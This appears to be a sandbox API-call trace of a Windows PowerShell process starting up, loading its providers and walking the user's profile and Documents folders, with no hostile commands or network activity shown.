	[0212.976] GetFullPathNameW (in: lpFileName="C:\\", nBufferLength=0x105, lpBuffer=0x17d1e0, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3
	[0212.977] SetErrorMode (uMode=0x1) returned 0x1
	[0212.977] GetFileAttributesExW (in: lpFileName="C:\\" (normalized: "c:"), fInfoLevelId=0x0, lpFileInformation=0x17d440 | out: lpFileInformation=0x17d440*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0x3c0142d0, ftCreationTime.dwHighDateTime=0x1ca042c, ftLastAccessTime.dwLowDateTime=0x6cd47e0, ftLastAccessTime.dwHighDateTime=0x1d337b1, ftLastWriteTime.dwLowDateTime=0x6cd47e0, ftLastWriteTime.dwHighDateTime=0x1d337b1, nFileSizeHigh=0x0, nFileSizeLow=0x2000)) returned 1
	[0212.977] SetErrorMode (uMode=0x1) returned 0x1
	[0212.977] CoTaskMemAlloc (cb=0x804) returned 0x1b7df860
	[0212.977] GetUserNameExW (in: NameFormat=0x2, lpNameBuffer=0x1b7df860, nSize=0x17d848 | out: lpNameBuffer="YKYD69Q\\aETAdzjz", nSize=0x17d848) returned 0x1
	[0212.977] CoTaskMemFree (pv=0x1b7df860) 
	[0212.977] CoTaskMemAlloc (cb=0x204) returned 0x3e8150
	[0212.977] GetUserNameW (in: lpBuffer=0x3e8150, pcbBuffer=0x17d888 | out: lpBuffer="aETAdzjz", pcbBuffer=0x17d888) returned 1
	[0212.977] CoTaskMemFree (pv=0x3e8150) 
	[0212.978] ReportEventW (hEventLog=0x1b8b0008, wType=0x4, wCategory=0x6, dwEventID=0x258, lpUserSid=0x0, wNumStrings=0x3, dwDataSize=0x0, lpStrings=0x2ce3fc8*="FileSystem", lpRawData=0x2ce3d58) returned 1
	[0212.994] CoTaskMemAlloc (cb=0x104) returned 0x42df80
	[0212.994] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x42df80, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0212.994] CoTaskMemFree (pv=0x42df80) 
	[0212.996] GetUserNameExW (in: NameFormat=0x2, lpNameBuffer=0x1b7df860, nSize=0x17d848 | out: lpNameBuffer="YKYD69Q\\aETAdzjz", nSize=0x17d848) returned 0x1
	[0212.997] CoTaskMemFree (pv=0x1b7df860) 
	[0212.997] CoTaskMemAlloc (cb=0x204) returned 0x3e8150
	[0212.997] GetUserNameW (in: lpBuffer=0x3e8150, pcbBuffer=0x17d888 | out: lpBuffer="aETAdzjz", pcbBuffer=0x17d888) returned 1
	[0212.997] CoTaskMemFree (pv=0x3e8150) 
	[0212.998] ReportEventW (hEventLog=0x1b8b0008, wType=0x4, wCategory=0x6, dwEventID=0x258, lpUserSid=0x0, wNumStrings=0x3, dwDataSize=0x0, lpStrings=0x2ce97b8*="Function", lpRawData=0x2ce9548) returned 1
	[0213.131] CoTaskMemAlloc (cb=0x104) returned 0x42df80
	[0213.131] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x42df80, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0213.131] CoTaskMemFree (pv=0x42df80) 
	[0219.148] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x17d0f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0219.148] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x17d040, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0219.148] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x17d040, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0219.150] CoTaskMemAlloc (cb=0x804) returned 0x1b7df860
	[0219.150] GetUserNameExW (in: NameFormat=0x2, lpNameBuffer=0x1b7df860, nSize=0x17d848 | out: lpNameBuffer="YKYD69Q\\aETAdzjz", nSize=0x17d848) returned 0x1
	[0219.150] CoTaskMemFree (pv=0x1b7df860) 
	[0219.150] CoTaskMemAlloc (cb=0x204) returned 0x3e8150
	[0219.150] GetUserNameW (in: lpBuffer=0x3e8150, pcbBuffer=0x17d888 | out: lpBuffer="aETAdzjz", pcbBuffer=0x17d888) returned 1
	[0219.151] CoTaskMemFree (pv=0x3e8150) 
	[0219.151] ReportEventW (hEventLog=0x1b8b0008, wType=0x4, wCategory=0x6, dwEventID=0x258, lpUserSid=0x0, wNumStrings=0x3, dwDataSize=0x0, lpStrings=0x2d1bb40*="Registry", lpRawData=0x2d1b8d0) returned 1
	[0219.562] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x17d0f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0219.562] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x17d040, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0219.562] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x17d040, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0219.563] CoTaskMemAlloc (cb=0x804) returned 0x1b7df860
	[0219.563] GetUserNameExW (in: NameFormat=0x2, lpNameBuffer=0x1b7df860, nSize=0x17d848 | out: lpNameBuffer="YKYD69Q\\aETAdzjz", nSize=0x17d848) returned 0x1
	[0219.563] CoTaskMemFree (pv=0x1b7df860) 
	[0219.563] CoTaskMemAlloc (cb=0x204) returned 0x3e8150
	[0219.563] GetUserNameW (in: lpBuffer=0x3e8150, pcbBuffer=0x17d888 | out: lpBuffer="aETAdzjz", pcbBuffer=0x17d888) returned 1
	[0219.564] CoTaskMemFree (pv=0x3e8150) 
	[0219.564] ReportEventW (hEventLog=0x1b8b0008, wType=0x4, wCategory=0x6, dwEventID=0x258, lpUserSid=0x0, wNumStrings=0x3, dwDataSize=0x0, lpStrings=0x2d20f08*="Variable", lpRawData=0x2d20c98) returned 1
	[0219.606] CoTaskMemAlloc (cb=0x104) returned 0x42df80
	[0219.606] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x42df80, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0219.606] CoTaskMemFree (pv=0x42df80) 
	[0219.608] CoTaskMemAlloc (cb=0x104) returned 0x42df80
	[0219.608] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x42df80, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0219.608] CoTaskMemFree (pv=0x42df80) 
	[0219.611] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", nBufferLength=0x105, lpBuffer=0x17d0f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", lpFilePart=0x0) returned 0x76
	[0219.611] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", nBufferLength=0x105, lpBuffer=0x17d040, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", lpFilePart=0x0) returned 0x76
	[0219.611] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", nBufferLength=0x105, lpBuffer=0x17d040, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", lpFilePart=0x0) returned 0x76
	[0219.611] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", nBufferLength=0x105, lpBuffer=0x17d040, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", lpFilePart=0x0) returned 0x76
	[0221.148] CoTaskMemAlloc (cb=0x804) returned 0x1b7df860
	[0221.148] GetUserNameExW (in: NameFormat=0x2, lpNameBuffer=0x1b7df860, nSize=0x17d848 | out: lpNameBuffer="YKYD69Q\\aETAdzjz", nSize=0x17d848) returned 0x1
	[0221.148] CoTaskMemFree (pv=0x1b7df860) 
	[0221.148] CoTaskMemAlloc (cb=0x204) returned 0x3e8150
	[0221.148] GetUserNameW (in: lpBuffer=0x3e8150, pcbBuffer=0x17d888 | out: lpBuffer="aETAdzjz", pcbBuffer=0x17d888) returned 1
	[0221.148] CoTaskMemFree (pv=0x3e8150) 
	[0221.149] ReportEventW (hEventLog=0x1b8b0008, wType=0x4, wCategory=0x6, dwEventID=0x258, lpUserSid=0x0, wNumStrings=0x3, dwDataSize=0x0, lpStrings=0x2d34ad0*="Certificate", lpRawData=0x2d34860) returned 1
	[0221.652] CoTaskMemAlloc (cb=0x104) returned 0x42df80
	[0221.652] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x42df80, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0221.652] CoTaskMemFree (pv=0x42df80) 
	[0221.655] GetLogicalDrives () returned 0x4
	[0221.655] GetFullPathNameW (in: lpFileName="C:\\.", nBufferLength=0x105, lpBuffer=0x17d4d0, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3
	[0221.656] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3
	[0221.656] CoTaskMemAlloc (cb=0x20e) returned 0x406080
	[0221.657] GetCurrentDirectoryW (in: nBufferLength=0x105, lpBuffer=0x406080 | out: lpBuffer="C:\\Users\\aETAdzjz\\Documents") returned 0x1b
	[0221.657] CoTaskMemFree (pv=0x406080) 
	[0221.658] CoTaskMemAlloc (cb=0x104) returned 0x42df80
	[0221.658] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x42df80, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0221.658] CoTaskMemFree (pv=0x42df80) 
	[0221.658] CoTaskMemAlloc (cb=0x104) returned 0x42df80
	[0221.658] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x42df80, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0221.658] CoTaskMemFree (pv=0x42df80) 
	[0221.678] CoTaskMemAlloc (cb=0x104) returned 0x42df80
	[0221.678] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x42df80, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0221.684] CoTaskMemAlloc (cb=0x104) returned 0x42df80
	[0221.684] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x42df80, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0221.687] GetFullPathNameW (in: lpFileName="C:\\Users\\aETAdzjz\\Documents", nBufferLength=0x105, lpBuffer=0x17d230, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\aETAdzjz\\Documents", lpFilePart=0x0) returned 0x1b
	[0221.687] SetErrorMode (uMode=0x1) returned 0x1
	[0221.687] GetFileAttributesExW (in: lpFileName="C:\\Users\\aETAdzjz\\Documents" (normalized: "c:\\users\\aetadzjz\\documents"), fInfoLevelId=0x0, lpFileInformation=0x17d490 | out: lpFileInformation=0x17d490*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x2335d4a0, ftCreationTime.dwHighDateTime=0x1d2f180, ftLastAccessTime.dwLowDateTime=0x7eb942d0, ftLastAccessTime.dwHighDateTime=0x1d543d1, ftLastWriteTime.dwLowDateTime=0x7eb942d0, ftLastWriteTime.dwHighDateTime=0x1d543d1, nFileSizeHigh=0x0, nFileSizeLow=0x2000)) returned 1
	[0221.687] SetErrorMode (uMode=0x1) returned 0x1
	[0221.687] GetFullPathNameW (in: lpFileName="C:\\Users\\aETAdzjz\\Documents", nBufferLength=0x105, lpBuffer=0x17d230, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\aETAdzjz\\Documents", lpFilePart=0x0) returned 0x1b
	[0221.687] SetErrorMode (uMode=0x1) returned 0x1
	[0221.687] GetFileAttributesExW (in: lpFileName="C:\\Users\\aETAdzjz\\Documents" (normalized: "c:\\users\\aetadzjz\\documents"), fInfoLevelId=0x0, lpFileInformation=0x17d490 | out: lpFileInformation=0x17d490*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x2335d4a0, ftCreationTime.dwHighDateTime=0x1d2f180, ftLastAccessTime.dwLowDateTime=0x7eb942d0, ftLastAccessTime.dwHighDateTime=0x1d543d1, ftLastWriteTime.dwLowDateTime=0x7eb942d0, ftLastWriteTime.dwHighDateTime=0x1d543d1, nFileSizeHigh=0x0, nFileSizeLow=0x2000)) returned 1
	[0221.687] SetErrorMode (uMode=0x1) returned 0x1
	[0221.689] CoTaskMemAlloc (cb=0x104) returned 0x42df80
	[0221.689] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x42df80, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0222.297] GetFullPathNameW (in: lpFileName="C:\\Users\\aETAdzjz\\Documents", nBufferLength=0x105, lpBuffer=0x17d3d0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\aETAdzjz\\Documents", lpFilePart=0x0) returned 0x1b
	[0222.299] GetFullPathNameW (in: lpFileName="C:\\", nBufferLength=0x105, lpBuffer=0x17d240, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3
	[0222.300] SetErrorMode (uMode=0x1) returned 0x1
	[0222.300] GetFileAttributesExW (in: lpFileName="C:\\" (normalized: "c:"), fInfoLevelId=0x0, lpFileInformation=0x17d450 | out: lpFileInformation=0x17d450*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0x3c0142d0, ftCreationTime.dwHighDateTime=0x1ca042c, ftLastAccessTime.dwLowDateTime=0x6cd47e0, ftLastAccessTime.dwHighDateTime=0x1d337b1, ftLastWriteTime.dwLowDateTime=0x6cd47e0, ftLastWriteTime.dwHighDateTime=0x1d337b1, nFileSizeHigh=0x0, nFileSizeLow=0x2000)) returned 1
	[0222.300] SetErrorMode (uMode=0x1) returned 0x1
	[0222.300] GetFullPathNameW (in: lpFileName="C:\\", nBufferLength=0x105, lpBuffer=0x17d240, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3
	[0222.300] SetErrorMode (uMode=0x1) returned 0x1
	[0222.300] GetFileAttributesExW (in: lpFileName="C:\\" (normalized: "c:"), fInfoLevelId=0x0, lpFileInformation=0x17d450 | out: lpFileInformation=0x17d450*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0x3c0142d0, ftCreationTime.dwHighDateTime=0x1ca042c, ftLastAccessTime.dwLowDateTime=0x6cd47e0, ftLastAccessTime.dwHighDateTime=0x1d337b1, ftLastWriteTime.dwLowDateTime=0x6cd47e0, ftLastWriteTime.dwHighDateTime=0x1d337b1, nFileSizeHigh=0x0, nFileSizeLow=0x2000)) returned 1
	[0222.300] SetErrorMode (uMode=0x1) returned 0x1
	[0222.300] GetFullPathNameW (in: lpFileName="C:\\", nBufferLength=0x105, lpBuffer=0x17d250, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3
	[0222.300] GetFullPathNameW (in: lpFileName="C:\\.", nBufferLength=0x105, lpBuffer=0x17d140, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3
	[0222.300] GetFullPathNameW (in: lpFileName="C:\\Users", nBufferLength=0x105, lpBuffer=0x17d240, lpFilePart=0x0 | out: lpBuffer="C:\\Users", lpFilePart=0x0) returned 0x8
	[0222.300] SetErrorMode (uMode=0x1) returned 0x1
	[0222.301] GetFileAttributesExW (in: lpFileName="C:\\Users" (normalized: "c:\\users"), fInfoLevelId=0x0, lpFileInformation=0x17d450 | out: lpFileInformation=0x17d450*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfda01e06, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x2329edc0, ftLastAccessTime.dwHighDateTime=0x1d2f180, ftLastWriteTime.dwLowDateTime=0x2329edc0, ftLastWriteTime.dwHighDateTime=0x1d2f180, nFileSizeHigh=0x0, nFileSizeLow=0x1000)) returned 1
	[0222.301] SetErrorMode (uMode=0x1) returned 0x1
	[0222.301] GetFullPathNameW (in: lpFileName="C:\\Users", nBufferLength=0x105, lpBuffer=0x17d240, lpFilePart=0x0 | out: lpBuffer="C:\\Users", lpFilePart=0x0) returned 0x8
	[0222.301] SetErrorMode (uMode=0x1) returned 0x1
	[0222.301] GetFileAttributesExW (in: lpFileName="C:\\Users" (normalized: "c:\\users"), fInfoLevelId=0x0, lpFileInformation=0x17d450 | out: lpFileInformation=0x17d450*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfda01e06, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x2329edc0, ftLastAccessTime.dwHighDateTime=0x1d2f180, ftLastWriteTime.dwLowDateTime=0x2329edc0, ftLastWriteTime.dwHighDateTime=0x1d2f180, nFileSizeHigh=0x0, nFileSizeLow=0x1000)) returned 1
	[0222.301] SetErrorMode (uMode=0x1) returned 0x1
	[0222.301] GetFullPathNameW (in: lpFileName="C:\\Users", nBufferLength=0x105, lpBuffer=0x17d250, lpFilePart=0x0 | out: lpBuffer="C:\\Users", lpFilePart=0x0) returned 0x8
	[0222.301] GetFullPathNameW (in: lpFileName="C:\\Users\\.", nBufferLength=0x105, lpBuffer=0x17d140, lpFilePart=0x0 | out: lpBuffer="C:\\Users", lpFilePart=0x0) returned 0x8
	[0222.302] GetFullPathNameW (in: lpFileName="C:\\Users\\aETAdzjz", nBufferLength=0x105, lpBuffer=0x17d240, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\aETAdzjz", lpFilePart=0x0) returned 0x11
	[0222.302] SetErrorMode (uMode=0x1) returned 0x1
	[0222.302] GetFileAttributesExW (in: lpFileName="C:\\Users\\aETAdzjz" (normalized: "c:\\users\\aetadzjz"), fInfoLevelId=0x0, lpFileInformation=0x17d450 | out: lpFileInformation=0x17d450*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x2329edc0, ftCreationTime.dwHighDateTime=0x1d2f180, ftLastAccessTime.dwLowDateTime=0x7d929a80, ftLastAccessTime.dwHighDateTime=0x1d2f182, ftLastWriteTime.dwLowDateTime=0x7d929a80, ftLastWriteTime.dwHighDateTime=0x1d2f182, nFileSizeHigh=0x0, nFileSizeLow=0x2000)) returned 1
	[0222.302] SetErrorMode (uMode=0x1) returned 0x1
	[0222.302] GetFullPathNameW (in: lpFileName="C:\\Users\\aETAdzjz", nBufferLength=0x105, lpBuffer=0x17d240, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\aETAdzjz", lpFilePart=0x0) returned 0x11
	[0222.302] SetErrorMode (uMode=0x1) returned 0x1
	[0222.302] GetFileAttributesExW (in: lpFileName="C:\\Users\\aETAdzjz" (normalized: "c:\\users\\aetadzjz"), fInfoLevelId=0x0, lpFileInformation=0x17d450 | out: lpFileInformation=0x17d450*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x2329edc0, ftCreationTime.dwHighDateTime=0x1d2f180, ftLastAccessTime.dwLowDateTime=0x7d929a80, ftLastAccessTime.dwHighDateTime=0x1d2f182, ftLastWriteTime.dwLowDateTime=0x7d929a80, ftLastWriteTime.dwHighDateTime=0x1d2f182, nFileSizeHigh=0x0, nFileSizeLow=0x2000)) returned 1
	[0222.302] SetErrorMode (uMode=0x1) returned 0x1
	[0222.302] GetFullPathNameW (in: lpFileName="C:\\Users\\aETAdzjz", nBufferLength=0x105, lpBuffer=0x17d250, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\aETAdzjz", lpFilePart=0x0) returned 0x11
	[0222.302] GetFullPathNameW (in: lpFileName="C:\\Users\\aETAdzjz\\.", nBufferLength=0x105, lpBuffer=0x17d140, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\aETAdzjz", lpFilePart=0x0) returned 0x11
	[0222.302] GetFullPathNameW (in: lpFileName="C:\\Users\\aETAdzjz\\Documents", nBufferLength=0x105, lpBuffer=0x17d240, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\aETAdzjz\\Documents", lpFilePart=0x0) returned 0x1b
	[0222.302] SetErrorMode (uMode=0x1) returned 0x1
	[0222.303] GetFileAttributesExW (in: lpFileName="C:\\Users\\aETAdzjz\\Documents" (normalized: "c:\\users\\aetadzjz\\documents"), fInfoLevelId=0x0, lpFileInformation=0x17d450 | out: lpFileInformation=0x17d450*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x2335d4a0, ftCreationTime.dwHighDateTime=0x1d2f180, ftLastAccessTime.dwLowDateTime=0x7eb942d0, ftLastAccessTime.dwHighDateTime=0x1d543d1, ftLastWriteTime.dwLowDateTime=0x7eb942d0, ftLastWriteTime.dwHighDateTime=0x1d543d1, nFileSizeHigh=0x0, nFileSizeLow=0x2000)) returned 1
	[0222.303] SetErrorMode (uMode=0x1) returned 0x1
	[0222.303] GetFullPathNameW (in: lpFileName="C:\\Users\\aETAdzjz\\Documents", nBufferLength=0x105, lpBuffer=0x17d240, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\aETAdzjz\\Documents", lpFilePart=0x0) returned 0x1b
	[0222.303] SetErrorMode (uMode=0x1) returned 0x1
	[0222.303] GetFileAttributesExW (in: lpFileName="C:\\Users\\aETAdzjz\\Documents" (normalized: "c:\\users\\aetadzjz\\documents"), fInfoLevelId=0x0, lpFileInformation=0x17d450 | out: lpFileInformation=0x17d450*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x2335d4a0, ftCreationTime.dwHighDateTime=0x1d2f180, ftLastAccessTime.dwLowDateTime=0x7eb942d0, ftLastAccessTime.dwHighDateTime=0x1d543d1, ftLastWriteTime.dwLowDateTime=0x7eb942d0, ftLastWriteTime.dwHighDateTime=0x1d543d1, nFileSizeHigh=0x0, nFileSizeLow=0x2000)) returned 1
	[0222.303] SetErrorMode (uMode=0x1) returned 0x1
	[0222.303] GetFullPathNameW (in: lpFileName="C:\\Users\\aETAdzjz\\Documents", nBufferLength=0x105, lpBuffer=0x17d250, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\aETAdzjz\\Documents", lpFilePart=0x0) returned 0x1b
	[0222.303] GetFullPathNameW (in: lpFileName="C:\\Users\\aETAdzjz\\Documents\\.", nBufferLength=0x105, lpBuffer=0x17d140, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\aETAdzjz\\Documents", lpFilePart=0x0) returned 0x1b
	[0222.303] GetFullPathNameW (in: lpFileName="C:\\Users", nBufferLength=0x105, lpBuffer=0x17d280, lpFilePart=0x0 | out: lpBuffer="C:\\Users", lpFilePart=0x0) returned 0x8
	[0222.303] SetErrorMode (uMode=0x1) returned 0x1
	[0222.304] GetFileAttributesExW (in: lpFileName="C:\\Users" (normalized: "c:\\users"), fInfoLevelId=0x0, lpFileInformation=0x17d490 | out: lpFileInformation=0x17d490*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfda01e06, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x2329edc0, ftLastAccessTime.dwHighDateTime=0x1d2f180, ftLastWriteTime.dwLowDateTime=0x2329edc0, ftLastWriteTime.dwHighDateTime=0x1d2f180, nFileSizeHigh=0x0, nFileSizeLow=0x1000)) returned 1
	[0222.304] SetErrorMode (uMode=0x1) returned 0x1
	[0222.304] GetFullPathNameW (in: lpFileName="C:\\Users", nBufferLength=0x105, lpBuffer=0x17d280, lpFilePart=0x0 | out: lpBuffer="C:\\Users", lpFilePart=0x0) returned 0x8
	[0222.304] SetErrorMode (uMode=0x1) returned 0x1
	[0222.304] GetFileAttributesExW (in: lpFileName="C:\\Users" (normalized: "c:\\users"), fInfoLevelId=0x0, lpFileInformation=0x17d490 | out: lpFileInformation=0x17d490*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfda01e06, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x2329edc0, ftLastAccessTime.dwHighDateTime=0x1d2f180, ftLastWriteTime.dwLowDateTime=0x2329edc0, ftLastWriteTime.dwHighDateTime=0x1d2f180, nFileSizeHigh=0x0, nFileSizeLow=0x1000)) returned 1
	[0222.304] SetErrorMode (uMode=0x1) returned 0x1
	[0222.304] GetFullPathNameW (in: lpFileName="C:\\Users", nBufferLength=0x105, lpBuffer=0x17d290, lpFilePart=0x0 | out: lpBuffer="C:\\Users", lpFilePart=0x0) returned 0x8
	[0222.304] GetFullPathNameW (in: lpFileName="C:\\Users\\.", nBufferLength=0x105, lpBuffer=0x17d180, lpFilePart=0x0 | out: lpBuffer="C:\\Users", lpFilePart=0x0) returned 0x8
	[0222.304] GetFullPathNameW (in: lpFileName="C:\\Users\\aETAdzjz", nBufferLength=0x105, lpBuffer=0x17d280, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\aETAdzjz", lpFilePart=0x0) returned 0x11
	[0222.304] SetErrorMode (uMode=0x1) returned 0x1
	[0222.304] GetFileAttributesExW (in: lpFileName="C:\\Users\\aETAdzjz" (normalized: "c:\\users\\aetadzjz"), fInfoLevelId=0x0, lpFileInformation=0x17d490 | out: lpFileInformation=0x17d490*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x2329edc0, ftCreationTime.dwHighDateTime=0x1d2f180, ftLastAccessTime.dwLowDateTime=0x7d929a80, ftLastAccessTime.dwHighDateTime=0x1d2f182, ftLastWriteTime.dwLowDateTime=0x7d929a80, ftLastWriteTime.dwHighDateTime=0x1d2f182, nFileSizeHigh=0x0, nFileSizeLow=0x2000)) returned 1
	[0222.304] SetErrorMode (uMode=0x1) returned 0x1
	[0222.304] GetFullPathNameW (in: lpFileName="C:\\Users\\aETAdzjz", nBufferLength=0x105, lpBuffer=0x17d280, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\aETAdzjz", lpFilePart=0x0) returned 0x11
	[0222.305] SetErrorMode (uMode=0x1) returned 0x1
	[0222.305] GetFileAttributesExW (in: lpFileName="C:\\Users\\aETAdzjz" (normalized: "c:\\users\\aetadzjz"), fInfoLevelId=0x0, lpFileInformation=0x17d490 | out: lpFileInformation=0x17d490*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x2329edc0, ftCreationTime.dwHighDateTime=0x1d2f180, ftLastAccessTime.dwLowDateTime=0x7d929a80, ftLastAccessTime.dwHighDateTime=0x1d2f182, ftLastWriteTime.dwLowDateTime=0x7d929a80, ftLastWriteTime.dwHighDateTime=0x1d2f182, nFileSizeHigh=0x0, nFileSizeLow=0x2000)) returned 1
	[0222.305] SetErrorMode (uMode=0x1) returned 0x1
	[0222.305] GetFullPathNameW (in: lpFileName="C:\\Users\\aETAdzjz", nBufferLength=0x105, lpBuffer=0x17d290, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\aETAdzjz", lpFilePart=0x0) returned 0x11
	[0222.305] GetFullPathNameW (in: lpFileName="C:\\Users\\aETAdzjz\\.", nBufferLength=0x105, lpBuffer=0x17d180, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\aETAdzjz", lpFilePart=0x0) returned 0x11
	[0222.305] GetFullPathNameW (in: lpFileName="C:\\Users\\aETAdzjz\\Documents", nBufferLength=0x105, lpBuffer=0x17d280, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\aETAdzjz\\Documents", lpFilePart=0x0) returned 0x1b
	[0222.305] SetErrorMode (uMode=0x1) returned 0x1
